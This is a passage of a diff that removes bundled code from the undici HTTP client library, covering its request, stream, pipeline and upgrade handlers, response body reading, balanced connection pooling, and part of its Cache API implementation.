- throw new InvalidArgumentError('invalid handler') - } - - const { signal, method, opaque, onInfo, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_PIPELINE') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.handler = handler - this.abort = null - this.context = null - this.onInfo = onInfo || null - - this.req = new PipelineRequest().on('error', util.nop) - - this.ret = new Duplex({ - readableObjectMode: opts.objectMode, - autoDestroy: true, - read: () => { - const { body } = this - - if (body && body.resume) { - body.resume() - } - }, - write: (chunk, encoding, callback) => { - const { req } = this - - if (req.push(chunk, encoding) || req._readableState.destroyed) { - callback() - } else { - req[kResume] = callback - } - }, - destroy: (err, callback) => { - const { body, req, res, ret, abort } = this - - if (!err && !ret._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (abort && err) { - abort() - } - - util.destroy(body, err) - util.destroy(req, err) - util.destroy(res, err) - - removeSignal(this) - - callback(err) - } - }).on('prefinish', () => { - const { req } = this - - // Node < 15 does not call _final in same tick. - req.push(null) - }) - - this.res = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - const { ret, res } = this - - assert(!res, 'pipeline cannot be retried') - - if (ret.destroyed) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume) { - const { opaque, handler, context } = this - - if (statusCode < 200) { - if (this.onInfo) { - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.onInfo({ statusCode, headers }) - } - return - } - - this.res = new PipelineResponse(resume) - - let body - try { - this.handler = null - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - body = this.runInAsyncScope(handler, null, { - statusCode, - headers, - opaque, - body: this.res, - context - }) - } catch (err) { - this.res.on('error', util.nop) - throw err - } - - if (!body || typeof body.on !== 'function') { - throw new InvalidReturnValueError('expected Readable') - } - - body - .on('data', (chunk) => { - const { ret, body } = this - - if (!ret.push(chunk) && body.pause) { - body.pause() - } - }) - .on('error', (err) => { - const { ret } = this - - util.destroy(ret, err) - }) - .on('end', () => { - const { ret } = this - - ret.push(null) - }) - .on('close', () => { - const { ret } = this - - if (!ret._readableState.ended) { - util.destroy(ret, new RequestAbortedError()) - } - }) - - this.body = body - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - res.push(null) - } - - onError (err) { - const { ret } = this - this.handler = null - util.destroy(ret, err) - } -} - -function pipeline (opts, handler) { - try { - const pipelineHandler = new PipelineHandler(opts, handler) - this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) - return pipelineHandler.ret - } catch (err) { - return new PassThrough().destroy(err) - } -} - -module.exports = pipeline - - -/***/ }), - -/***/ 5448: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Readable = __nccwpck_require__(3858) -const { - InvalidArgumentError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class RequestHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { - throw new InvalidArgumentError('invalid highWaterMark') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_REQUEST') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.res = null - this.abort = null - this.body = body - this.trailers = {} - this.context = null - this.onInfo = onInfo || null - this.throwOnError = throwOnError - this.highWaterMark = highWaterMark - - if (util.isStream(body)) { - body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - const body = new Readable({ resume, abort, contentType, highWaterMark }) - - this.callback = null - this.res = body - if (callback !== null) { - if (this.throwOnError && statusCode >= 400) { - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body, contentType, statusCode, statusMessage, headers } - ) - } else { - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - trailers: this.trailers, - opaque, - body, - context - }) - } - } - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - util.parseHeaders(trailers, this.trailers) - - res.push(null) - } - - onError (err) { - const { res, callback, body, opaque } = this - - removeSignal(this) - - if (callback) { - // TODO: Does this need queueMicrotask? - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (res) { - this.res = null - // Ensure all queued handlers are invoked before destroying res. - queueMicrotask(() => { - util.destroy(res, err) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function request (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - request.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new RequestHandler(opts, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = request -module.exports.RequestHandler = RequestHandler - - -/***/ }), - -/***/ 5395: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { finished, PassThrough } = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class StreamHandler extends AsyncResource { - constructor (opts, factory, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('invalid factory') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_STREAM') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.factory = factory - this.callback = callback - this.res = null - this.abort = null - this.context = null - this.trailers = null - this.body = body - this.onInfo = onInfo || null - this.throwOnError = throwOnError || false - - if (util.isStream(body)) { - body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { factory, opaque, context, callback, responseHeaders } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - this.factory = null - - let res - - if (this.throwOnError && statusCode >= 400) { - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - res = new PassThrough() - - this.callback = null - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body: res, contentType, statusCode, statusMessage, headers } - ) - } else { - if (factory === null) { - return - } - - res = this.runInAsyncScope(factory, null, { - statusCode, - headers, - opaque, - context - }) - - if ( - !res || - typeof res.write !== 'function' || - typeof res.end !== 'function' || - typeof res.on !== 'function' - ) { - throw new InvalidReturnValueError('expected Writable') - } - - // TODO: Avoid finished. It registers an unnecessary amount of listeners. - finished(res, { readable: false }, (err) => { - const { callback, res, opaque, trailers, abort } = this - - this.res = null - if (err || !res.readable) { - util.destroy(res, err) - } - - this.callback = null - this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) - - if (err) { - abort() - } - }) - } - - res.on('drain', resume) - - this.res = res - - const needDrain = res.writableNeedDrain !== undefined - ? res.writableNeedDrain - : res._writableState && res._writableState.needDrain - - return needDrain !== true - } - - onData (chunk) { - const { res } = this - - return res ? res.write(chunk) : true - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - if (!res) { - return - } - - this.trailers = util.parseHeaders(trailers) - - res.end() - } - - onError (err) { - const { res, callback, opaque, body } = this - - removeSignal(this) - - this.factory = null - - if (res) { - this.res = null - util.destroy(res, err) - } else if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function stream (opts, factory, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - stream.call(this, opts, factory, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new StreamHandler(opts, factory, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = stream - - -/***/ }), - -/***/ 6923: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const { AsyncResource } = __nccwpck_require__(852) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -class UpgradeHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_UPGRADE') - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.abort = null - this.context = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = null - } - - onHeaders () { - throw new SocketError('bad upgrade', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - assert.strictEqual(statusCode, 101) - - removeSignal(this) - - this.callback = null - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.runInAsyncScope(callback, null, null, { - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function upgrade (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - upgrade.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const upgradeHandler = new UpgradeHandler(opts, callback) - this.dispatch({ - ...opts, - method: opts.method || 'GET', - upgrade: opts.protocol || 'Websocket' - }, upgradeHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = upgrade - - -/***/ }), - -/***/ 4059: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports.request = __nccwpck_require__(5448) -module.exports.stream = __nccwpck_require__(5395) -module.exports.pipeline = __nccwpck_require__(8752) -module.exports.upgrade = __nccwpck_require__(6923) -module.exports.connect = __nccwpck_require__(9744) - - -/***/ }), - -/***/ 3858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// Ported from https://github.com/nodejs/undici/pull/907 - - - -const assert = __nccwpck_require__(9491) -const { Readable } = __nccwpck_require__(2781) -const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) - -let Blob - -const kConsume = Symbol('kConsume') -const kReading = Symbol('kReading') -const kBody = Symbol('kBody') -const kAbort = Symbol('abort') -const kContentType = Symbol('kContentType') - -const noop = () => {} - -module.exports = class BodyReadable extends Readable { - constructor ({ - resume, - abort, - contentType = '', - highWaterMark = 64 * 1024 // Same as nodejs fs streams. - }) { - super({ - autoDestroy: true, - read: resume, - highWaterMark - }) - - this._readableState.dataEmitted = false - - this[kAbort] = abort - this[kConsume] = null - this[kBody] = null - this[kContentType] = contentType - - // Is stream being consumed through Readable API? - // This is an optimization so that we avoid checking - // for 'data' and 'readable' listeners in the hot path - // inside push(). - this[kReading] = false - } - - destroy (err) { - if (this.destroyed) { - // Node < 16 - return this - } - - if (!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (err) { - this[kAbort]() - } - - return super.destroy(err) - } - - emit (ev, ...args) { - if (ev === 'data') { - // Node < 16.7 - this._readableState.dataEmitted = true - } else if (ev === 'error') { - // Node < 16 - this._readableState.errorEmitted = true - } - return super.emit(ev, ...args) - } - - on (ev, ...args) { - if (ev === 'data' || ev === 'readable') { - this[kReading] = true - } - return super.on(ev, ...args) - } - - addListener (ev, ...args) { - return this.on(ev, ...args) - } - - off (ev, ...args) { - const ret = super.off(ev, ...args) - if (ev === 'data' || ev === 'readable') { - this[kReading] = ( - this.listenerCount('data') > 0 || - this.listenerCount('readable') > 0 - ) - } - return ret - } - - removeListener (ev, ...args) { - return this.off(ev, ...args) - } - - push (chunk) { - if (this[kConsume] && chunk !== null && this.readableLength === 0) { - consumePush(this[kConsume], chunk) - return this[kReading] ? super.push(chunk) : true - } - return super.push(chunk) - } - - // https://fetch.spec.whatwg.org/#dom-body-text - async text () { - return consume(this, 'text') - } - - // https://fetch.spec.whatwg.org/#dom-body-json - async json () { - return consume(this, 'json') - } - - // https://fetch.spec.whatwg.org/#dom-body-blob - async blob () { - return consume(this, 'blob') - } - - // https://fetch.spec.whatwg.org/#dom-body-arraybuffer - async arrayBuffer () { - return consume(this, 'arrayBuffer') - } - - // https://fetch.spec.whatwg.org/#dom-body-formdata - async formData () { - // TODO: Implement. - throw new NotSupportedError() - } - - // https://fetch.spec.whatwg.org/#dom-body-bodyused - get bodyUsed () { - return util.isDisturbed(this) - } - - // https://fetch.spec.whatwg.org/#dom-body-body - get body () { - if (!this[kBody]) { - this[kBody] = ReadableStreamFrom(this) - if (this[kConsume]) { - // TODO: Is this the best way to force a lock? - this[kBody].getReader() // Ensure stream is locked. - assert(this[kBody].locked) - } - } - return this[kBody] - } - - dump (opts) { - let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 - const signal = opts && opts.signal - - if (signal) { - try { - if (typeof signal !== 'object' || !('aborted' in signal)) { - throw new InvalidArgumentError('signal must be an AbortSignal') - } - util.throwIfAborted(signal) - } catch (err) { - return Promise.reject(err) - } - } - - if (this.closed) { - return Promise.resolve(null) - } - - return new Promise((resolve, reject) => { - const signalListenerCleanup = signal - ? util.addAbortListener(signal, () => { - this.destroy() - }) - : noop - - this - .on('close', function () { - signalListenerCleanup() - if (signal && signal.aborted) { - reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) - } else { - resolve(null) - } - }) - .on('error', noop) - .on('data', function (chunk) { - limit -= chunk.length - if (limit <= 0) { - this.destroy() - } - }) - .resume() - }) - } -} - -// https://streams.spec.whatwg.org/#readablestream-locked -function isLocked (self) { - // Consume is an implicit lock. - return (self[kBody] && self[kBody].locked === true) || self[kConsume] -} - -// https://fetch.spec.whatwg.org/#body-unusable -function isUnusable (self) { - return util.isDisturbed(self) || isLocked(self) -} - -async function consume (stream, type) { - if (isUnusable(stream)) { - throw new TypeError('unusable') - } - - assert(!stream[kConsume]) - - return new Promise((resolve, reject) => { - stream[kConsume] = { - type, - stream, - resolve, - reject, - length: 0, - body: [] - } - - stream - .on('error', function (err) { - consumeFinish(this[kConsume], err) - }) - .on('close', function () { - if (this[kConsume].body !== null) { - consumeFinish(this[kConsume], new RequestAbortedError()) - } - }) - - process.nextTick(consumeStart, stream[kConsume]) - }) -} - -function consumeStart (consume) { - if (consume.body === null) { - return - } - - const { _readableState: state } = consume.stream - - for (const chunk of state.buffer) { - consumePush(consume, chunk) - } - - if (state.endEmitted) { - consumeEnd(this[kConsume]) - } else { - consume.stream.on('end', function () { - consumeEnd(this[kConsume]) - }) - } - - consume.stream.resume() - - while (consume.stream.read() != null) { - // Loop - } -} - -function consumeEnd (consume) { - const { type, body, resolve, stream, length } = consume - - try { - if (type === 'text') { - resolve(toUSVString(Buffer.concat(body))) - } else if (type === 'json') { - resolve(JSON.parse(Buffer.concat(body))) - } else if (type === 'arrayBuffer') { - const dst = new Uint8Array(length) - - let pos = 0 - for (const buf of body) { - dst.set(buf, pos) - pos += buf.byteLength - } - - resolve(dst.buffer) - } else if (type === 'blob') { - if (!Blob) { - Blob = (__nccwpck_require__(4300).Blob) - } - resolve(new Blob(body, { type: stream[kContentType] })) - } - - consumeFinish(consume) - } catch (err) { - stream.destroy(err) - } -} - -function consumePush (consume, chunk) { - consume.length += chunk.length - consume.body.push(chunk) -} - -function consumeFinish (consume, err) { - if (consume.body === null) { - return - } - - if (err) { - consume.reject(err) - } else { - consume.resolve() - } - - consume.type = null - consume.stream = null - consume.resolve = null - consume.reject = null - consume.length = 0 - consume.body = null -} - - -/***/ }), - -/***/ 7474: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { - ResponseStatusCodeError -} = __nccwpck_require__(8045) -const { toUSVString } = __nccwpck_require__(3983) - -async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { - assert(body) - - let chunks = [] - let limit = 0 - - for await (const chunk of body) { - chunks.push(chunk) - limit += chunk.length - if (limit > 128 * 1024) { - chunks = null - break - } - } - - if (statusCode === 204 || !contentType || !chunks) { - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) - return - } - - try { - if (contentType.startsWith('application/json')) { - const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - - if (contentType.startsWith('text/')) { - const payload = toUSVString(Buffer.concat(chunks)) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - } catch (err) { - // Process in a fallback if error - } - - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) -} - -module.exports = { getResolveErrorBodyCallback } - - -/***/ }), - -/***/ 7931: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - BalancedPoolMissingUpstreamError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Pool = __nccwpck_require__(4634) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const { parseOrigin } = __nccwpck_require__(3983) -const kFactory = Symbol('factory') - -const kOptions = Symbol('options') -const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') -const kCurrentWeight = Symbol('kCurrentWeight') -const kIndex = Symbol('kIndex') -const kWeight = Symbol('kWeight') -const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') -const kErrorPenalty = Symbol('kErrorPenalty') - -function getGreatestCommonDivisor (a, b) { - if (b === 0) return a - return getGreatestCommonDivisor(b, a % b) -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class BalancedPool extends PoolBase { - constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { - super() - - this[kOptions] = opts - this[kIndex] = -1 - this[kCurrentWeight] = 0 - - this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 - this[kErrorPenalty] = this[kOptions].errorPenalty || 15 - - if (!Array.isArray(upstreams)) { - upstreams = [upstreams] - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) - ? opts.interceptors.BalancedPool - : [] - this[kFactory] = factory - - for (const upstream of upstreams) { - this.addUpstream(upstream) - } - this._updateBalancedPoolStats() - } - - addUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - if (this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - ))) { - return this - } - const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) - - this[kAddClient](pool) - pool.on('connect', () => { - pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) - }) - - pool.on('connectionError', () => { - pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - }) - - pool.on('disconnect', (...args) => { - const err = args[2] - if (err && err.code === 'UND_ERR_SOCKET') { - // decrease the weight of the pool. - pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - } - }) - - for (const client of this[kClients]) { - client[kWeight] = this[kMaxWeightPerServer] - } - - this._updateBalancedPoolStats() - - return this - } - - _updateBalancedPoolStats () { - this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) - } - - removeUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - const pool = this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - )) - - if (pool) { - this[kRemoveClient](pool) - } - - return this - } - - get upstreams () { - return this[kClients] - .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) - .map((p) => p[kUrl].origin) - } - - [kGetDispatcher] () { - // We validate that pools is greater than 0, - // otherwise we would have to wait until an upstream - // is added, which might never happen. - if (this[kClients].length === 0) { - throw new BalancedPoolMissingUpstreamError() - } - - const dispatcher = this[kClients].find(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - - if (!dispatcher) { - return - } - - const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) - - if (allClientsBusy) { - return - } - - let counter = 0 - - let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) - - while (counter++ < this[kClients].length) { - this[kIndex] = (this[kIndex] + 1) % this[kClients].length - const pool = this[kClients][this[kIndex]] - - // find pool index with the largest weight - if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { - maxWeightIndex = this[kIndex] - } - - // decrease the current weight every `this[kClients].length`. - if (this[kIndex] === 0) { - // Set the current weight to the next lower weight. - this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] - - if (this[kCurrentWeight] <= 0) { - this[kCurrentWeight] = this[kMaxWeightPerServer] - } - } - if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { - return pool - } - } - - this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] - this[kIndex] = maxWeightIndex - return this[kClients][maxWeightIndex] - } -} - -module.exports = BalancedPool - - -/***/ }), - -/***/ 6101: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) -const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) -const { kHeadersList } = __nccwpck_require__(2785) -const { webidl } = __nccwpck_require__(1744) -const { Response, cloneResponse } = __nccwpck_require__(7823) -const { Request } = __nccwpck_require__(8359) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { fetching } = __nccwpck_require__(4881) -const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) -const assert = __nccwpck_require__(9491) -const { getGlobalDispatcher } = __nccwpck_require__(1892) - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation - * @typedef {Object} CacheBatchOperation - * @property {'delete' | 'put'} type - * @property {any} request - * @property {any} response - * @property {import('../../types/cache').CacheQueryOptions} options - */ - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list - * @typedef {[any, any][]} requestResponseList - */ - -class Cache { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list - * @type {requestResponseList} - */ - #relevantRequestResponseList - - constructor () { - if (arguments[0] !== kConstruct) { - webidl.illegalConstructor() - } - - this.#relevantRequestResponseList = arguments[1] - } - - async match (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - const p = await this.matchAll(request, options) - - if (p.length === 0) { - return - } - - return p[0] - } - - async matchAll (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { - // 2.2.1 - r = new Request(request)[kState] - } - } - - // 5. - // 5.1 - const responses = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - responses.push(requestResponse[1]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - responses.push(requestResponse[1]) - } - } - - // 5.4 - // We don't implement CORs so we don't need to loop over the responses, yay! - - // 5.5.1 - const responseList = [] - - // 5.5.2 - for (const response of responses) { - // 5.5.2.1 - const responseObject = new Response(response.body?.source ?? null) - const body = responseObject[kState].body - responseObject[kState] = response - responseObject[kState].body = body - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - - responseList.push(responseObject) - } - - // 6. - return Object.freeze(responseList) - } - - async add (request) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) - - request = webidl.converters.RequestInfo(request) - - // 1. - const requests = [request] - - // 2. - const responseArrayPromise = this.addAll(requests) - - // 3. - return await responseArrayPromise - } - - async addAll (requests) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) - - requests = webidl.converters['sequence'](requests) - - // 1. - const responsePromises = [] - - // 2. - const requestList = [] - - // 3. - for (const request of requests) { - if (typeof request === 'string') { - continue - } - - // 3.1 - const r = request[kState] - - // 3.2 - if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme when method is not GET.' - }) - } - } - - // 4. - /** @type {ReturnType[]} */ - const fetchControllers = [] - - // 5. - for (const request of requests) { - // 5.1 - const r = new Request(request)[kState] - - // 5.2 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme.' - }) - } - - // 5.4 - r.initiator = 'fetch' - r.destination = 'subresource' - - // 5.5 - requestList.push(r) - - // 5.6 - const responsePromise = createDeferredPromise() - - // 5.7 - fetchControllers.push(fetching({ - request: r, - dispatcher: getGlobalDispatcher(), - processResponse (response) { - // 1. - if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Received an invalid status code or the request failed.' - })) - } else if (response.headersList.contains('vary')) { // 2. - // 2.1 - const fieldValues = getFieldValues(response.headersList.get('vary')) - - // 2.2 - for (const fieldValue of fieldValues) { - // 2.2.1 - if (fieldValue === '*') { - 